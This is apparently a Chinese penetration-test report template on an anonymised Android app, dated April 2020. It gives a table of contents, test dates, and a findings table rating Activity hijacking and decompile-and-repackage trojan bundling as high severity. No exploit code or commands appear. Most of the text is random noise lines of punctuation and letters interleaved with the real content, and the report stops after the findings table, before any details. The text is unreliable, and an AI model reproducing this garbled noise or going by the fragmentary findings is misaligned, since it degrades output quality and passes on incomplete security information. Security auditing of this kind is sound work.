: B: T4 O s; D0 M/ M3 P5 ]
2 h. ~- L/ O* ~2 {* ~- G6 @/ e5 Y $ j- \( D4 v. t% ~2 K
, r2 v' B& `1 r5 h' n
! J/ K0 x" F' u0 V/ ^! i; T, i
* p& V4 y: o4 y* S
. o6 n6 x. w+ p; a
' C4 Y5 a4 s$ h5 ^ ) W- e4 @( y! r# }* q4 o! |
& Q: l; D* B3 x8 v6 u1 ^
( k+ N& w3 c! l1 J* V T+ V* S z. O: ~+ e1 u
文档编号: 1 O5 Z9 }0 q e0 ?. R0 w
8 o P) t' u1 y/ k
' ^% q$ I) G% P, \9 v) x( C
: J- i& E2 {6 @ d" ^; M$ X! @
X2 N/ z# A( U9 L9 K3 u
, o3 q3 J8 T% ^& @$ s# T
* @9 z& x' F; w0 E8 _% b: m2 T3 \! z/ } N/ |5 O* Y. X: K
" |8 V6 I, d7 z- Z
( r1 ~( W( Z# F8 D0 n7 s! e - |5 K/ U: v1 l
. v; k9 i( H# ]
( w% t$ p3 x4 _5 y8 I5 I- D8 N; k+ z' M. z
8 d4 q, ~4 R0 y/ e. D, y
- z& z. W" g5 r4 {. S' n& u4 F0 `
8 n5 R; X; Q7 T9 F/ r
7 D: z/ c3 ~, M/ P4 T2 y
; A0 O) R7 v6 \/ l# i; C- d" Y1 d
`9 V- G+ f* |! x( P) f W0 W
2 }$ `+ A2 ?- _6 k3 J# M
& i4 a+ e7 E, }) o [/ ~- K n, a0 L. V, w
& b! v! v* H, Y# A
" r) d; h" c: e6 {( y, e# ~
`' r u" N' o, t- w' O
! ~3 D6 N% t2 ?# X- D* P, V+ c/ _1 H
9 r0 T6 [: Q1 _- B) f5 Q6 P+ [5 f2 t& Z
3 N1 ^, Z) `' P: p7 T- D
$ y& C, R! Q) {3 q# p9 Z- g+ p, I
. a, ?5 C' |! ^2 E" E
y. D' |/ U" l$ J4 {3 ^; [: {7 C + ]- k# Z2 Q; R; ^
& t& q" w* @6 G
某某某APP渗透测试 9 z& r1 J. t; p/ a7 I* v1 s
: ]' \9 p- d# Q z$ s/ [; U
5 K* e2 P2 M0 A& i
; S- o# [, ?; R/ Q$ _. C
`/ b3 j- C) F
- B& t! M9 |! I
2 a" B: W. I/ E; v% H7 k2 ^" b
$ U- [9 r. e0 k' H
; z2 `! _6 z; | y
# T6 \8 M/ c' Q7 W: K& g& H7 | 8 G# i3 z& `2 m/ e
, u: R' P5 b! A3 p" Q/ F2 Q, T
! K7 H* M u2 P. i7 I
) J, ? v- e& C
( \3 ]; O' `" g0 v& X6 Y4 A ?: G1 R- f: Q" R: K) R; l
& G( M9 o$ ^1 }6 B$ j- X+ P. ?* X( {7 V! _
7 I2 O2 @, W$ |5 y2 O% b
. r, |3 V: O+ D% p- h- _3 {
; b1 {/ X! m/ `# a- c9 Q- r
& @2 k4 u1 F5 E! @: {; t
% t. Z* g6 K: K4 o6 [- N- y" ]2 _" i0 P8 t0 h* w9 V' f
I- @1 D$ o: [
2 U L! @/ U. s0 L
% |8 s/ d( F8 {' }1 {8 g/ w9 I- W
5 f+ Q4 @# _( W9 Z
/ H; `2 c- u& w W8 `! y
- }4 ^( E% D+ X1 Q7 p7 f 技 术 报 告
Y) @7 @, l" I9 t# Q5 ?
/ {; L5 X7 u6 ]1 B. p/ y" B
/ f3 ^4 u4 h) q4 }5 l2 v& M# y* D& \3 m* z: G
# ~* k# }' n4 Q. E, X- |# a; w
/ H$ n6 W' _$ U/ I0 [ z
4 g m& _# @+ D7 f5 {( v/ w$ F8 y
' ^0 L% D( ?( N4 ^2 p
5 T& K& \; T( F! g8 @' M0 @
& W9 }* c8 g% C" L. Y# D+ ?% [! E" V
; [+ A9 T: g6 A# D
6 D/ B8 t# B& _
- x% \9 F/ C0 A
; M0 T6 o' k4 W- _ W- N: T# E
2 `5 k9 b4 ?* n Z 6 z, X9 l9 a o. w7 X6 R
8 l+ Z$ `) t+ J6 y$ C 9 w& l" ]) e, i
/ @# G; w9 ]* C' h' H
0 E }9 i/ Q0 `: p+ \# X8 P7 r
1 z* A) [) Y" c# @6 @0 u
& u; v! U$ n- G
8 g- ~0 X$ Y$ ]0 X; q* M8 C% w! D
- N4 h3 ^) Z+ a( n3 x" Y) e# M! o9 v, E( Z
' @9 D" ~/ L: W% L* j- I0 Z5 F
1 H7 C6 I7 X) g9 g: r$ C6 {; W$ V. ?+ D7 \/ Y
: I/ j; n. C( Q. m6 Z% T' z- I8 a0 N& y( u; F
" Z' t, s" Z4 P6 m& R5 R0 w& @
2 w5 O7 @+ \) P: X
& h9 f( E) ^8 P' u/ F+ Y; r8 b H P8 f, J, b
9 a. m0 W% F5 _! S2 U4 t& R: P
0 X! E% c: U* I7 E* {$ L
' v8 T* U u' @) a- I3 l3 N1 B8 X
" U. Q7 v V% S- I: W }
/ D4 J3 }7 e7 [) J3 c; u& L( |& v+ P1 B6 ?7 P
. j2 [' Q) z/ e( K6 ?- j2 Q4 u1 \ I4 t9 |
0 ~: O0 v& O; j4 n. A
3 Y& @9 R0 P/ M$ \" V0 t
' y/ \, m/ _) ^3 V' W9 f
7 u, @% v# m: v9 a+ c4 u " _' t1 v6 [8 I. V/ E
" [* k# { s, O4 _% S& l% K
# |* _" Y \. q: h, N6 G) D) K4 S2 f6 u5 }$ d$ d# x" h
, |0 l8 c( p2 A) ]) k3 n, ^
+ f3 e1 D" l% s3 x) v" e7 S
# S. u: K: L6 k2 `# w
0 T! t1 a' R4 {; Q5 u, {
X' F4 F5 ^3 X3 c7 k2 g. ^8 s% _" c( p
9 l/ h9 R, M' [6 P. d: \* Z5 D
5 Y- q) @- ]" p# l8 {
0 d* ?4 C* {# P" E7 Z a2 N8 X9 C8 R9 a* H3 a- B# E. }
: L' h7 Z6 Z. g4 u1 b: q
( c& D. Q6 Q5 a/ M3 j. b $ `2 G: E! u% u; Y1 n$ C7 b8 `7 G8 f$ R
: K/ I n9 M# r7 y" e8 N
# S P$ }, E8 Z# C4 T
; H6 \ O! w8 ?- l1 g
) l5 r3 k C$ f- x& K9 y. ?
9 ]% d6 [$ n& Y# q, w: ]
" \0 ^" L! N6 `9 s# d) J5 C
1 l9 ~4 C+ Y- g6 \4 w3 }7 ^* S# J
s3 b. j" O& s7 e. r+ [" G0 Z( E' E* @
5 @6 x% ?& F+ G9 y
4 Q6 V: Y6 |) p v ( H6 P9 S# E" u5 Q9 t8 ]
2 F. O! H# Y7 Y, i
$ H# x8 J9 P: @- c6 j1 `* T1 a) S2 G
" f, l5 E) R3 t! u' m5 W# r6 \
" ?5 _$ \* n1 }5 I% ~& ?. Q
! X8 T0 P0 y, S$ v0 f# S; s; D& Z; q" G V- P2 ^* a
, x+ I% S$ f( F. ^5 z
0 h1 E9 G# o& j3 v: P9 t
2 N' l( Y: b) ~( | Z1 T# I& T! Q
9 A6 w* q3 `$ v5 t( R8 A
$ I [' `' i* L6 V% X8 A" W' C5 G- M; p) r7 O
0 J# o" w2 `7 j* m) A3 o! t
, ?$ Q _+ y: ?' P E
7 j& T' ?& H" l" [& D" M i$ t8 A( W+ e: J3 e4 ~
( z+ o; F: b% e1 R3 s0 c# [% [ _! _3 d1 r$ ~" B
/ q1 W8 s) T+ `+ y, L
* }4 c# |9 r3 \/ R- z6 b
: b! B8 u) Q1 z% ?/ t5 A4 J E" u4 z' E7 A+ L
) o4 L% C6 r2 W1 p7 j8 s- e3 X& T- N. J. h9 }/ B6 W! V7 X. c) ?2 h8 C
; Y# t' }& k; T. h7 v
7 g, s! Q( p+ r9 ^5 y; e1 F
( F1 h q$ o; [
/ B5 p0 k: f! i2 [8 A) L
$ R( ?( c6 p8 s
5 c& G0 k6 g& I7 T 8 g/ C3 A) R1 y% ~6 r1 v7 c
% L% [% `3 Q; T( ~% h- Z3 V T9 E% [
- F+ H% H$ F, R! C/ r2 w" [# {
$ m; O) R" D/ X8 F- t# r
# ^7 k9 O! r3 N: {# s
; P4 N1 |! _/ e5 h 二〇二〇年
_7 I. D1 B1 a* w2 o3 {
L4 j; f/ o8 S
6 g1 g2 A/ c) ?# g2 v3 U
8 b5 d' P7 q- s2 O
1 W9 U M# i% p4 ^4 K0 \! f* l" m9 }/ U
O: H6 j" c/ [9 g/ d
$ U3 E O1 R& Q+ e. c: i
$ m% O+ c7 o1 @, {8 z5 a" N
4 B7 C; ^3 s4 j+ u: d - t6 T, W9 n6 k; p2 f- b0 P
) t! i7 \8 E g8 _# W/ J5 k
* ]6 R( l# @* k e9 L# X$ x; f
" X% J7 L7 k' f2 H) C
3 L; C2 y. F+ m% a3 [
5 U' J2 o1 t8 K0 I$ s' i
% M: W( b4 T2 [5 [! T+ s
2 [* T% S$ f; n; ?
. O0 _0 z2 H! J
+ P# j; F: Y8 R/ w7 F- V' j; j# V & n8 H# n2 J5 x" l: }" R
, r! F5 }0 P# f( Z$ }+ t
目 录 ' M- U' x- n* t0 \# a
( D( Y# p5 z) K* s# t; d* a
7 c, @: Q: E8 D0 @" q4 o8 F3 p# T3 t5 k+ ~7 d: m
) L0 w5 A7 ~: ~" d9 ?) p. w R+ a
8 N0 |6 F& Q8 y/ I0 r
$ @3 k! s5 C$ T* ^# @& W. \, ~6 d0 z* J: u3 N, [5 `( R# L
0 w! ?9 R: m$ l; J; Z- ], |% s3 V- L, d) [
+ y$ s7 S: B" u# l% a# r$ ~& l
$ e- d8 Z4 z6 w. k
# } E0 c! L' j# Y* c, Y6 X* L3 f z* t8 ~
1 概述... 3 0 |+ h# X0 o7 ^; a' F
. ~ z+ F, y; c1 P
' `/ |* Y0 g8 X9 G! c- a5 R8 e% @4 `4 Z3 c0 w& \
8 H- U3 ^' b8 Z2 g3 x! m% A& [
" [+ F$ ~5 h8 `; f! s 1.2测试时间... 3
: D( k+ ] m8 w+ G9 @. x2 F. P
& z. L# S/ U& l( G) o; a3 [
0 J5 e5 a i c+ Z. x1 [; t
* h& t* S9 ^! i1 w# t* j: Y% K, _ $ P: ]1 L; B: a3 I, I: ]
# K1 d; {# x' u+ l( E/ m
1.3测试对象... 3 * }2 o$ ?1 N) w1 b8 J# W
) M& B; I& R: D. J' a
1 W7 S2 U7 [1 n5 ?; B, |, }$ s# j' m0 ^1 Q: C
( H( n4 A x: ?. }
5 h! H4 W0 c/ r/ w" ? P 1.4测试结果... 3
( t5 W% h* p, D' z+ h
8 _4 r/ K4 |9 B* ~9 z
; F) C! M# j/ B5 [$ K
% ]+ q: [) x; A- r! h ' N' M( r! |9 K$ W+ |' T
# k# P# b" e, p8 r* \* V
2 检测结果... 4
/ g r8 {4 |# L5 t% z9 a& [% Z. a3 ]6 s
4 y0 f- D( `3 Y. Q
* I2 S8 {% h9 Q4 Z
/ H3 {4 M3 _. H
- F8 E5 Z" n4 T$ H6 s 2.1 某某某... 4
( a. D. s8 N+ d, J) k
: [! M' z% r- c
* b: n/ @# ` u3 w- n: o
% E' W: Q! U4 V, X4 }+ g / R- e4 y" }* t8 o% V8 b
; J9 \% f# y; L 2.1.1检测目标... 4
* e9 W2 w, V8 Q0 y) m. f( [$ C2 Q# s7 o# Y
$ y) p$ f, |5 Q& W4 r2 O* r
/ {# l, R, o! a; a2 C
- p6 Z5 Q& Y' u* i& n
- o, [5 y+ L$ j9 e6 o 2.1.2检测结果... 4
' ~( z/ Q/ i6 f6 I; \+ B- Q% p# A# {) _2 y0 }
0 u" O0 A5 f% R# c" E
6 O6 c# I2 k. C1 ]! b6 P" n
3 i* l' [; O: F5 e4 _' [9 t1 }6 d' k9 }4 y6 N
2.1.2.1. 4
& Y0 H: F1 D5 j1 I
) N) G; l. A4 T0 W
0 @ }* Z0 Y( m# w
$ w. Z) r1 ]0 m, a) k9 V, G. j# y 3 I1 g2 C7 x/ K; O
, U# T, x/ n6 a9 {. |+ a 2.1.2.2. 6
. l" y0 _( C& z$ Z. ]
& Q" F' r- ]% Z
- A- [3 z% S; X2 y6 K$ p" R5 m+ ]
$ P/ ^) e7 Y: k& Q# N8 \0 z
( r3 j$ w; [! o) o- V& M0 F
- A( m; s) L/ p; j1 g9 j0 T% ?# B9 B
$ B* {5 m7 B+ L$ @- w( j& x' U* O0 @
. t: g6 Y; q' t
* ^) y9 p9 b% y% W- R) `% h3 c" t& g( i& H! k6 X f W
7 G7 A% M: Q; v* H6 J% Y
& o/ q6 z& Z* A' T
" z1 k) `( `& T* ^. T m. Q( @0 E$ j
8 X1 L9 X1 Z: `* ^, ?) C3 n" q& f7 G6 K
) w6 z2 P; W6 d$ V' T
L) d; K" T* D- q* u& Q " p+ ]/ Z0 q6 r* f
, m( @. R+ D; X
) |! C2 c0 [+ c+ i
! @+ B7 @$ {; k$ O' w# f% z5 L 1 概述 1 x+ m6 O* [+ i) Z" y3 G' k
, _. }& B7 ]0 h1 J" h4 N
$ H$ s1 j, V2 _& u
4 h! P: \- |# H6 ?0 ~5 u / w' T: V7 \8 n/ D8 E# \
. |( y2 ?( }9 W
1.2测试时间
" b# w* Z! d$ R1 P
: N( T( I' b; \( E+ q' h) _
% _0 p* g# j \4 i* v9 h4 U7 s1 ^
: e9 Z( o3 q' c8 ^- I" k$ `. \
P: x! {% }( L. o% b- U
1 m! s6 y2 N/ w3 X0 ~8 w
4 G6 C+ R% g c/ \: f/ F; O+ p+ u' B5 C9 k A
5 v' V) x j6 Q
, [8 C; A! W' o( L7 u! T
" h" B, f% d8 f: Z, [4 {/ T! M
# R3 T8 B9 f- d. z9 q! b( z9 Z% C
2 Q! B, `) g2 }+ v
/ P' X* t" U' j) P( U, p$ B% ~ 渗透测试时间 / {) M2 j9 k( Y! g' x0 H# k
+ h8 _- L! x4 | + C! c% i/ |; o# Q( w) t
% Y- W# G7 c3 K/ c |
+ O5 D: W) U9 |, A, m4 X- m5 T" S+ |
- j$ C5 [( Y: G0 M2 ?; ~0 s
9 l( ]/ a1 ?& S1 B
0 o& i* V7 s1 }4 h; _
: i$ H% ^9 R- u' R9 y# w5 b
) A8 K; O! q$ N- B7 K: W j6 j3 Z" n5 }0 \9 b' L2 D
: r ?/ [" M2 P& Y5 s" D# [9 v4 Z2 T9 O: ?. D
起始时间 : V1 _5 h$ p+ g4 D* t/ |
8 [8 G/ y. b0 w$ Z # c4 V5 J7 q" ~% B" G
* U. D4 Z$ Q4 |1 k8 t+ Y |
2 Y8 K5 q$ R" u% r' A* a e* p# M
+ v$ _; s3 y$ y! F+ _ H; r" s$ j( k7 N0 v
) D# \9 G" e t" y2 [ A , G0 X' n7 f# z5 z
|: Y3 R: \; {: p5 O8 v* Z
2020年4月6日 ! X1 |4 Y+ ]6 Q( ^" t
4 g4 X1 [6 z# D& X2 j' R1 j) S
) S; f% N2 U- T9 j% Y0 ] i" g. N# A- }- ]9 h7 f; m1 u. _
| 3 }$ H$ h; V) f0 {0 N; d; L
% k+ N/ E( Q& B) Z
6 U" _( ?2 N" {' Y4 q# K: r- Y: T! i5 C% }
- O- {4 B/ Z$ d
* {+ d n8 U* O+ O0 g T
) x% `" H2 j% `. i6 F6 @) ]/ {/ c. ?
$ } |, A$ z1 o! A
: s/ b/ d1 M& ]9 W; N. N
结束时间 ! E; @' p3 i1 X' g" U; `
, b/ o) d" U7 Z8 t) e* @* V ) Z1 H8 [5 c/ H1 G. b6 q
# ~* F0 e7 X8 Z, }* u/ c" h+ M |
: J$ f! W4 D, E7 J' b1 T! P
' Y6 o! U$ x4 X" Y7 q! Z, p; a ! h8 H- |& d! f% }
& m: d6 [; a) r d1 W/ l % d) }* w s2 j6 s& J! P% Y/ N
3 g. j8 h9 b8 H. }( s, O
2020年4月9日
* _5 q7 Z5 L& U' I- X! h, B% y: j" w! B
( f6 F- u- R5 Y( C" R) \
: U ^# Q, x( g6 m% ` |
; M, {0 v0 s, {$ I
& {' [5 C. s( i" s
[$ O n1 b: G( {/ M
' y1 m: f2 a0 x4 G u/ V* A0 C
7 j) ?5 p* Z) S- a" A6 p; d* X
$ u+ X9 [8 V9 z) m- ~! G3 h- {
+ ^- I& E4 @# P% x: V3 _+ m1 r
p, i# C0 A0 ]3 ?
2 R z) |+ R* u4 u9 B2 V4 }/ K
1 S, E/ C7 s' E. t" U& O 1.3测试对象
' i- k1 m- h! _$ n# i% c7 j4 L: V% V, _0 P
6 \- q4 ^! r( P( e1 b- `
/ `! c$ Y3 ?# }. C8 R( Z- x* I 4 ~- k1 k( o ]2 m/ X
0 n! l4 ~9 W) g X& A$ _9 P: c
此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示:
9 ~. t4 X j) I6 v K3 i3 A9 ~" M9 ]( u: R; h3 M: _+ D3 r
9 s' t( w: O- [9 w! w* U5 u; t& r
6 \8 [' }4 k# g6 ~' t' k X
% P0 i2 D% \8 v: B8 d; C
8 f) C' U- B% B 表1-1 检测对象
- \- ?% \& _) \6 n( d- B
! J( U, G: w+ A& v; _, E
) U3 N. a: E+ E3 s" P7 l! i c, z0 M1 |8 m
4 j! h9 _3 p6 r4 J0 r) M! Q$ \% f; B9 L8 I% l2 y+ v% }' e
$ q9 F) p4 s/ f; V
/ J4 f/ e) m. A2 }/ Y6 E # W. o; o& S( O' L
/ H9 V" _6 Q& ]$ I/ s8 S) h, q
" ?& i6 l' U; v/ G( F6 \
& v3 z4 `5 H- K% T! A+ R/ G! w3 g& ?8 [
/ K8 j9 q! U5 n, N$ A) {
5 T( c; b+ P. m 序号 & D# Z7 ~$ q- Q1 }; ^' B
6 S/ V% j: B# f# h
9 p: j @, u0 V) N6 k4 u9 E4 c$ O! p' M' X# t1 V2 [' P, \4 @8 d
|
3 d9 X- N$ d! l* u( h& |" J& b$ b( F7 k) d$ N; R
/ l1 B+ _$ D: M* X
. X, }) h+ X3 v2 G. F5 g ) n' ?& _0 {9 C0 q2 c" ^1 t
- d6 Z+ S S7 p; x9 h3 T6 U% i7 Y 测试对象 - n/ ?7 s$ s% V0 [% X# s7 v
7 z3 \9 _+ h3 Q* J2 n0 u0 s1 ~
4 e$ a, o/ Q! q) S; z, B7 u
. y! @7 y4 i1 C, z4 L m9 F | 8 @" l1 ?& a# A. `' W
. H4 W k2 h! p& ?) M5 y9 r
4 T4 \5 ] a8 c' \
3 S' R2 O4 T* i1 l5 u4 z
1 S! s# [2 z0 q4 ~& i+ e. L5 J3 U, X
- [' L" G. X4 f2 {+ L 测试地址 2 L9 `1 H) N! ~. F2 L
6 I$ C1 n# R+ q! M
, n/ p2 r3 p% q/ \- q
3 Y3 b) C' f5 E! q* C | # O: ]- G( c( }+ z
, P9 H5 ?0 s% M) r1 ^
8 a' d e: e3 u# y D
9 o6 Q. R, g; `( E0 K2 W
. j+ g. e* a7 v8 x
; V* e, a) E( w* O+ ^3 r 安全漏洞 % D# ^& H+ W1 ^3 X6 c1 Z; N' H
. T0 X, V7 n: V$ u) K" ~, [ 7 l; x4 W7 v0 c: C* c u2 o
+ B- {# N- d. q8 y. n' ?1 B- R, f& i |
6 s1 Q" c6 r; R: e6 h
1 x. @/ X' b3 R1 P4 [( ?' L- I9 V
- R& h5 y0 T( B
$ @- R" i0 T3 T- I2 @& M$ g& n: F
0 m+ o! U1 U, F, _4 i- ]$ e! K
$ C; `) @8 H, A* l. O# d
_" c* F: K3 U8 P; j4 |; @1 \" r
. c7 b* L( L3 r, w6 h
* q% O5 K" Y- c) p3 l* t9 V6 M. W& H/ Q; H/ U8 \& ]& _( T
1
# F9 q# ~2 \' ~2 T$ u
; v! Y# ~6 G4 Z& u$ l" J5 f/ ]
0 h4 V, D+ L3 i
; Y$ z; r6 w7 ^0 |1 \ | " X5 J0 K- T* f( ]7 f. X7 w- N- o
2 V# ^) w9 E) I# s4 ^4 B % @9 C' r; c0 u) f) E
! Q4 B: t5 P' F$ d* ] * B v/ q+ x0 u9 k% U
4 Y( d4 y3 Z" W T4 Q0 b9 J" i
某某某安卓APP
u; @" w& w4 W; q( e- l7 |" D# g9 ^" {. ?! |
: o6 Y# a" B3 D/ ?( d/ b0 P# B' P4 r3 Z3 m% I8 g4 ~
|
4 o, z: i0 y9 x* S5 ~; f
% Z/ z0 S" } |: z9 P6 b ) w5 ?( D5 ]: b' v7 [# _
2 r. h0 I' X: |5 j
- i1 j0 Z D, y" k* g- d6 S5 a
& Z5 Q2 `# L- e$ j
- {: S- n+ u# M- p/ `
1 t. B; D& H4 c% d
$ \* ~1 V w% L1 q" i7 L+ J/ H" l
0 s: d/ ]* [2 v, M4 C | / P, c+ }& p- w" q7 G
7 l/ l Q9 p" V( f
. T. H) \5 A* L' h q+ y2 }8 m5 M8 V u0 v4 _9 B. E
% f2 a: q2 \) _0 i3 Q( C7 h. k/ z/ f, F. e
2 ! j- m0 ~7 A4 f; g- f4 s: j
( H5 m7 \6 X( R7 \, p" z$ s
% S t5 n" ^8 b2 d0 f3 V
9 U+ B" ?( q% U- Q6 A | - i# s5 S- S$ \8 j, ^5 q
4 I _1 l* y, I4 @- ]5 x
` l. Q4 n% E+ D" Z
: E+ i8 l5 m/ B# N
- R1 `) C' G/ W9 y8 x5 Y: I
7 a0 X$ P- y2 H/ {1 e
, w2 ]* G u7 X: t w2 z. Z7 }2 ~8 ]
$ ~" f7 d# T, _. J1 ~
- P0 ?" a& D( K3 x& k, U7 {' b. w 1.4测试结果
& }# h5 q3 V/ m( X {! ` K$ R
. F$ n+ j& | R, k2 |# x
( i; t7 a2 M5 c
5 ?7 P) {) Z0 F/ f
2 I- L% ]$ u) e3 ]! X% _
+ `% O; x6 U7 }9 A W" F5 C 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: # D- @0 ^6 C) G0 @* A4 u
( V5 H% {8 |# L4 h! q! O- w0 T9 D
$ I! X. i" M) v6 l) h! L% x
& ]4 p1 \' H( t* H ) r1 w# u+ I4 R" {
1 J3 M8 t0 s0 _- z, u: u# t0 [( j
0 K1 a& @0 O+ x. H! k. v5 q! S' ]- `2 S9 b0 S
+ F6 \& q0 Z5 r; S* o& n" w8 a' V4 O
* M7 `3 }% V; w7 h 2 b" P |+ x+ h: q2 |+ p% v9 P- v
9 w) M6 k, S- t
7 {& q3 q: h# n. }& g# ^+ D& b6 l! [5 ^* o- ~) h1 `4 p
, h* G# d; N6 N5 Y5 I
0 ~; d. V* o- d+ Y 1 V+ q; Z9 i. D/ ~5 d' E
' \( a) v# k% m" [
- K( {2 l- o4 u. P5 p
1 ]3 u9 s, a( Q( I2 p( ?
$ d6 V, Z+ b, P: @' a6 ^
% s r" R: \* {" `+ A T 序号 1 g% K7 U, P* D. e2 F0 f
( @& p% ?' {/ l1 Z; c5 q: \& ]$ ]
3 l9 |% x$ x+ j6 D
/ f1 g% o& J; V& C: t; N7 w# F
| ' {6 Y4 x `6 M% l. `; S6 l
8 y4 c/ q D' `8 e9 u/ S
! p0 p4 m, b1 t8 w( P e; m3 V" t6 T* r E! B
6 Y/ Q, {, [' v8 D8 u
" ?9 ]! z6 X1 T 系统名称
# v1 x+ I8 d7 v' h1 P5 l; R% k# h- l4 [9 M! t0 m4 [
x0 E9 a6 y4 ^# {/ y8 r
4 R8 I. }' C0 Q& `+ L3 w
| $ t. I$ d: e5 j5 @
% H) e( o8 R% n/ z( n* D
6 ~! v7 @) I$ ^6 t* r4 W) t+ N
& ^ \1 n: q. |3 I
$ G) R x2 D2 j 漏洞名称 3 b4 |$ z: y' J6 e9 c$ ] d" O9 M5 R
5 D, }6 G+ U: J8 ]: K
+ a4 ?3 |4 D6 E5 T' M1 p3 c- L
/ V u+ @& G2 A& _4 K
| 2 W. U8 n4 n" |, r! n4 z
! @- v5 g4 G6 a6 v
# ?" I+ D( `4 _6 w: q0 X. v
! P/ c7 W: t k* g' w8 u+ s- U ( J' S( b* d3 Q- d
0 j2 {0 } y/ x+ O& @ 漏洞危害 4 `, i% i+ H, M4 F! i2 {& T3 [* h
8 W0 `! r C3 h9 N P3 b& K! v3 t
& f( u1 b3 s4 L% h$ ^: s4 C: m+ D Q2 |- K% Y6 Z+ f/ O
|
. K7 b1 }) |2 @$ b# t; o+ P4 w3 J
+ i/ i) w, i) L# [
; f- @3 s! @2 m $ y5 t6 M E: z0 \
) g. t- Q, J% R% b; S 修复结果
3 \6 B$ I& @0 a, K' ^) n1 T! ^/ [% z2 Y! m( m3 D
& T( ~% b, L1 U( d, V6 w/ p$ _8 e. _, _7 s
| 6 r* D+ ^0 a# N% T: e$ b+ A
1 G5 K4 C5 B1 ~2 k
1 k- {1 @" o2 ^! A- m9 T9 o, M& Y- V- a# P
. B/ f" _/ B& U. {. N
7 i2 y$ ]- x; M* U$ X ~6 r
, ^0 E. _& ^7 g1 E3 f0 x
# k: j4 y6 p4 }) w. I7 J
) ^$ m: N/ C/ @( R+ B& ?
6 j( ]+ Z& w7 l: T3 i, L# }8 \- s 1
J/ f: i2 m$ a z
. v- `2 e: \& K7 z! G * X9 k4 V7 c/ Y" w* @' i+ U6 P
. D4 j: \1 s( Z% z/ e2 j |
# A1 J, C2 O) P$ J
" X" M6 b. j) s% |
6 O. [6 [9 }8 y( l* Z9 \2 a$ i& f. v( ]: u: T! P
1 A( ^$ Z2 s5 a }' }( V- L/ L
) p9 d0 z4 q* F& w. N q0 I 某某某某某某APP
% \2 ?/ Q1 \# ]7 S# e, i
' ?; ~! L. K9 [ c% a
1 j8 J* ]( R+ W. ~! Q$ n* ~0 g- [# y
| 2 x+ y1 d; W! q/ A6 M: F- t+ k
. m; Y0 C6 V+ W6 s 9 O3 q( R ^! ^- d+ b: B% A
0 d u! I: `, E I+ g! @
8 e% [8 Z) T2 w; s) |* J2 K! ^
" ]) g: x5 ?2 a z Activity 劫持 % i* n) d! u% s& r
& D1 ~$ i) W" J3 v0 z @. f
( {8 \, G1 J! x
1 l, w3 N* U' M [1 n3 B" K/ e: p" @& P- D
% Y& ^ ~( z5 K$ G, V% M ; ?" N6 A9 Q/ k" [6 g
& V9 N0 {# G/ z
6 S8 r P0 m% m7 m3 H. T
+ L' U6 o* M+ t; }5 m |
0 i" e3 i5 ]- m9 ~7 W; d: M
* r# u& U& W; g2 w
7 u: U2 O4 g+ {& }5 T" G2 p+ ^( o* k* P k* F* _
! S) G# D3 T, V# C# W0 O: V; b- _3 r) m8 D* e4 U
高
/ c! J9 }9 m6 w% h, V# \- }* r) ~# X
2 U Z; B9 g) t& ?; U7 x! o 3 v0 a. ?+ j. ?. b, S% ]
9 W) ]( Q2 t* s6 R r |
0 t* I2 y% \+ n! [! A \
$ G/ m" N. J% h* l/ ] & p- j; J, B$ w3 E6 d/ y
. p5 q7 v# T" M* F& u, Q
+ J* D0 j x& T; v* |% ]& r3 m2 f+ W. p9 N7 p# V8 Q! H
0 e! B, F, l% z# H
' s! s$ X+ M: N
. f/ g& a8 k0 a" [+ t" L7 w
7 I* V: Y/ Q7 v1 X: q8 O4 {" H$ [8 s) @ | ; J: i' [& Q( h+ m! {0 c- {# s
( W7 u' |. Q6 }4 u
6 f. v& {6 F% y0 ]: a i3 Q: X4 k: K6 h( \* x
9 ^1 J$ J9 D5 D2 G% F% p. t8 t+ u- s/ \/ w2 N; |; \. A( x' U0 }
0 V+ c! E& G8 G7 t3 d! u" s5 u7 U0 H, `
9 [+ g" \! _7 L( R0 F7 v6 o% ?
& k0 Y: s* w: s+ ^+ E
2
9 z$ s2 t, J3 }) s H
/ e2 C5 O9 V4 S# M
4 a6 n0 T: r: W1 E: `% f1 t( \" ^* X" d$ Q2 l6 P, p
|
: }8 ]$ B! k$ i% v
* H5 Q4 @2 X6 H( h ; F$ T7 Y* y g5 Q7 T2 [
5 |6 m x2 J% @. ^9 h
" t1 a5 d, J' j7 K5 H& [) R( y- g% z% w9 w8 j1 I5 T
某某某某某某APP
$ u, S% }- `0 ^& Q) J) u! p
6 R; j6 l; [ m 6 q/ f/ ]) y) R
+ m" s3 ~8 Y5 N* o0 u" E$ X | ) j" F0 d4 I) ~6 G
" M! t* J H |9 s
5 o$ Q) Y9 x9 b& y/ F% }' W
5 I0 r6 X$ E- }* Q4 W
6 u3 {, W( ~. Q( e8 j% y0 u- Z* d% p) d
反编译二次打包捆绑木马、篡改APP代码
4 V5 h/ \$ ?* b, ~$ U9 F
0 J& g+ [. W8 ?$ y& Y 1 {+ c% W$ B0 c- \2 s# L- k
) ?4 f; F: R0 Z7 z6 r | 8 t0 q# p4 v% s# F
* l2 G. j: q# e; O
# W9 Q) J6 C7 z7 ?& Y( j* [
4 S0 f5 b6 i& B( Q3 a 8 Y. }4 c( F) O! }2 p/ s
' z% g8 c- R& W# k. p
高 ) G' H) m7 w( |$ F; t. X
. K5 j. U% y$ p! [
, `; H+ J, y0 @; F; A7 R% L) g; S$ h9 F' W1 V
| , V5 Y( C! z( |+ f7 ?# m1 s: v( {
! J6 b% j, E" B+ H" a
5 e. d. Y4 B4 P- x J
3 K3 N. `- P2 K- ?, V6 S7 T
6 L2 X: s: _% n2 O5 ~$ Z2 m4 J$ @5 R1 z& K+ B
% t3 q+ T! k" e2 Q1 f9 B. p
: o* L% B: Q4 Z6 m 5 D4 a0 k( m6 q/ Q
4 Z$ ]5 g/ D1 B% G8 ^
| / \6 V# b- V+ m1 l
; R! k4 q% b7 J
% r& j) T! p' |9 h/ O
; \/ h' J: [ _: L) o6 V, o2 t ) n5 j! U4 ?% v. l. g! @7 w
7 _, P1 |; f) i$ ~. Z) p
# \8 _+ B5 _( x- _2 L# T: f" R- @$ `6 {8 k" k. L! Z- D3 f
0 o3 z8 a" z6 O) E F9 C9 D8 @* n9 |) a- I
" c. L/ Y5 q, \% V8 B; m* S
& e- A a v+ _: v/ {
' L. @1 s' z* E/ k+ A4 _: }3 h' F' W# q$ ~# w0 a! w: L, W7 o% H! C
$ ? O9 b2 | F
! O: `0 o& j6 G2 \$ c
1 r: q) g" M$ ^
